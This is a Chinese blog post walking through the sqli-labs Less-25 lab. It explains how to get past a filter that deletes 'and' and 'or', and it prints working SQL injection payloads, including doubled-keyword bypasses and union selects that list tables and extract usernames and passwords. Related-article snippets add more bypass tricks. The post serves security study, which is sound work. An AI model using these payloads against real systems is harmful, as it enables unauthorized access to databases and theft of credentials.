SQL注入 绕过and和or过滤

最新推荐文章于 2024-05-18 15:32:27 发布
最新推荐文章于 2024-05-18 15:32:27 发布
阅读量2.3k 收藏 2
点赞数 2
分类专栏: 渗透 信息安全 web安全 文章标签: sql 数据库 mysql
原文链接:https://blog.csdn.net/m_de_g/article/details/121792949
版权

SQL注入 绕过and和or过滤

1.基础知识介绍

1.MySQL中的大小写不敏感,大写与小写一样。
2.MySQL中的十六进制与URL编码
3.符号和关键字替换and – &&、or–||
4.内联注释与多行注释

/*! 内联注释*/

    
    

    
    
  • 1
/*多行注释*/

    
    

    
    
  • 1

2.去除and和or的代码分析

preg_replace(mixed $pattern,mixed $replacement,mixed $subject):执行一个正则表达式的搜索和替换。
$pattern:要搜索的模式,可以是字符串或一个字符串数组
$replacement:用于替换的字符串或字符串组。
$subject:要搜索替换的目标字符串或字符串数组

在这里插入图片描述

$id= preg_replace('/or/i',"", $id);
$id= preg_replace('/AND/i',"", $id);

    
    

    
    
  • 1
  • 2

值得一说的是preg_replace函数后面的/i是指ignore,就是忽略大小写

3.绕过去除and和or的SQL注入

1.大小写变形,Or,OR,oR,OR,And,ANd,aND等 代码中大小写不敏感都被剔除
2.在这两个敏感词汇中添加注释,例如:a/**/nd 双写绕过 oorr
3.利用符号替代——and --&& or–||
我们以sqli-labs-less25为例
1.当我们输入1时,回显正常,当我们输入1\时报错

在这里插入图片描述
2.可以判断出,此sql注入为字符型,判断and,or等关键字是否被过滤

?id=1' and 1=1#

    
    

    
    
  • 1

在这里插入图片描述
3.发现andor被过滤为空,这里我使用的是双写绕过

?id=1' oorr 1=1--+

    
    

    
    
  • 1

在这里插入图片描述
4.爆破数据库
在这里插入图片描述
5.爆破数据表

?id=-1'and union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),3%23

    
    

    
    
  • 1

在这里插入图片描述

6.爆破字段名
在这里插入图片描述
7.爆破字段内容
获取用户名和密码

?id=-1' union select 1,(select group_concat(username,passwoorrd) from users),3--+

    
    

    
    
  • 1

在这里插入图片描述

</article>
“坤”
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
23-3 绕过过滤 and 和 or 的 SQL注入
weixin_43263566的博客
02-03 230
在深入了解SQL注入数据库安全话题之前,掌握一些MySQL数据库的基础知识是很重要的。
第十六节 绕过剔除and和or的SQL注入-01
09-15
绕过剔除and和or的SQL注入 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中插入恶意SQL代码来访问或修改数据库中的敏感信息。为了防止SQL注入,开发者需要对用户输入进行严格的验证和过滤。...
SQL注入时当and、or等字符被过滤了怎么办
热门推荐
weixin_40950781的博客
08-25 1万+
SQL注入时and、or被过滤了怎么办当常用字符被注释无法使用时,通常采取以下方法(可自行搜索sql注入绕开过滤等):0x01字母被注释(or、and等)1. 大小写变形2. 改变编码3. 添加注释4. 往字符里面插入被过滤的字符(双写法)5.利用符号形式0x02数字被注释(1、2等)6. 使用浮点数0x03 符号被注释(<、>等)7. 利用函数代替 当常用字符被注释无法使用时,通常采...
高级SQL注入:混淆和绕过
最新发布
余十步的博客
05-18 635
语句通常与聚合函数(count, sum, avg, min, or max.) 等联合使用来得到一个或多个列的结果集,语法:group_concat(要连接的字段,排序字段,分隔符(默认是逗号)),是转移符,用以匹配任何空白字符,包括空格、制表符、换页符等等,通常被用来构造一个恶意的语句以从数据库中获取更多数据。通常被用来构造一个恶意的语句以从数据库中获取更多数据。第一个数字可以控制输出的字符,第二个数字同样也可以,虽然看懂了一些,但是太菜了,无法用脚本来计算,
SQL注入时 and or 被过滤解决方式
m0_62207482的博客
03-14 628
大小写变形 编码 添加注释 双写法 利用符号形式 浮点数 #数字被注释 函数替代 #符号被注释
SQL注入攻击,遇到防火墙拦截(cookie注入基本用法)
waxcj的博客
04-15 4933
如图是封神台的一个SQL注入靶场, 进入网站后观察了一下网站的url发现没什么有用信息,随便进入了一个旁站,找到了想要的信息 首先我是想通过SQLMAP直接进行跑,发现跑不出来,然后想着手工注入,发现靶场设置了参数过滤。 因为我们目前是使用get方式进行传参,又因为有弹框,所以我想到了cookie注入的方法。 操作过程: 1:首先我们访问正常的网页http://kypt8004.ia.aqlab.cn/shownews.asp?id=171,等页面打开后我们清空url栏,然后我们..
高级SQL注入:混淆和绕过.pdf
03-21
1. 过滤规避(Mysql):通过使用特殊的SQL函数和运算符来绕过过滤规避,例如使用`GROUP BY`和`HAVING`函数来绕过传统的SQL注入检测。 2. 混淆技术:使用特殊的SQL函数和运算符来混淆SQL语句,例如使用`unhex()`和`...
SQL注入绕WAF小结
05-08
通过对以上SQL注入绕过WAF的技巧进行深入学习和实践,可以有效提高渗透测试人员的技术水平。然而,这些技巧的应用必须合法合规,并且仅限于授权的安全评估场景中。随着网络安全技术的不断发展,防御措施也会不断升级...
Web应用安全:使用SQL注入绕过认证实验.doc
06-17
以下是对"使用SQL注入绕过认证"实验的详细说明: 一、实验目的 1. 了解并实践SQL注入的基本原理,掌握其在绕过认证过程中的应用。 2. 掌握多种常见的SQL注入绕过技巧,增强防御SQL注入的能力。 二、实验内容 实验...
第十七节 绕过剔除空格的SQL注入-01
09-15
"绕过剔除空格的SQL注入" 绕过剔除空格的SQL注入是Web应用安全中的一种常见攻击方式。...为了防止这种攻击,我们需要了解基础知识,熟悉去除空格的代码分析,并且掌握绕过去除空格的SQL注入策略和Sqlmap安全检测技术。
(手工)【sqli-labs25-25a】报错注入、OR&AND过滤后注入
07-12 882
SQL-过滤后注入】
SQL注入之如何绕过and,union,where,limit过滤绕过
m0_57114395的博客
09-11 2342
当and被过滤时我们可以使用&&进行替换 mysql> select * from fristtb where id= 1 and sex=0x01; +----+------------+---------------------+ | id | sex | birthday | +----+------------+---------------------+ | 1 | 0x01 | 2001-01-20 00:00:00 |
sql注入过滤处理
富在术数不在劳身,利在势局不在力耕。
07-22 714
/*sql注入操作处理*/         function actionDowithsql($str)         {           $str = str_replace("and","",$str);           $str = str_replace("execute","",$str);           $str = str_replace("update",
sql注入绕开过滤的常用方法
u012684933的专栏
03-05 7815
1. 使用注释,例如:     SELECT/*foo*/username,password/*foo*/FROM/*foo*/users     在mysql中甚至可以在关键字中间插入注释,例如SEL/*foo*/ECT username,password FR/*foo*/OM users 2. 避免使用关键词,例如:  select ename, sal from emp w
mybatis sql注入拦截器
u010449328的博客
07-27 834
mybatis防范sql注入拦截插件,为了防止误伤其它参数,插件只解析了mapper中占位符${}的参数来匹配规则,该插件非侵入式和无其它依赖
防止Sql注入拦截
liuxinyang666的博客
01-30 990
这两天在做一个sql注入拦截,期间遇到了不少问题,最大的问题是在,拦截sql注入后利用response 重定向到错误页面,始终无法实现跳转。发现原因是,ajax 异步请求时并不会对response重定向做处理。当然包括response.getWrite().print(“”);等页面都不会做出反应。 下面是我的代码,首先是编写一个拦截器 package com.booway.pwbzh
sql注入过滤绕过
designer545的博客
07-13 1135
在一些网站,管理员会通过一些正则表达式来使过滤一些语句 此时,就要通过一些绕过方法来绕过过滤进行查询。 一、通过注释符绕过 注释符 # // 通过在关键词的中间加入注释符,使关键词不被识别 如 select 改为 se//lect 二、通过<>绕过 如 select 改为 sel<>ect 三、通过改变大小写绕过 四、如果and or被过滤 可以将and 用&& 替换 or 用 || 替换 五、通过重复关键词绕过 六、通过url编码绕过 七、等价函数与命令
SQL-labs的第25a关——or和and被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-03 117
有回显点我们选择联合攻击。判断回显点的方式和第25关一样。这说明这关无闭合方式,是数字型注入。
sql注入 or 和 and
08-22
SQL注入中的or和and是两个常见的关键字,用于拼接SQL语句的条件。 当应用程序没有对用户输入进行充分的过滤和验证时,攻击者可以通过构造恶意的输入来绕过输入验证,修改原始SQL语句的逻辑,从而执行非授权的操作。 在SQL语句中,or用于连接多个条件,只要满足其中一个条件就成立;而and则要求同时满足多个条件才成立。 为了防止SQL注入攻击,可以采取以下措施: 1. 使用参数化查询或预编译语句来构建SQL语句,将用户输入作为参数传递,而不是直接拼接在SQL语句中。 2. 对用户输入进行严格的过滤和验证,确保只有合法的输入才能通过。 3. 对用户输入进行转义,将特殊字符转换为其对应的转义序列,以防止恶意输入破坏SQL语句的结构。 4. 限制数据库用户的权限,确保其只能执行必要的操作,避免对数据库的非授权访问。 总之,在编写应用程序时,需要充分考虑安全性,对用户输入进行正确的过滤和验证,以防止SQL注入攻击。 <span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [SQL注入 绕过and和or过滤](https://blog.csdn.net/m_de_g/article/details/121792949)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值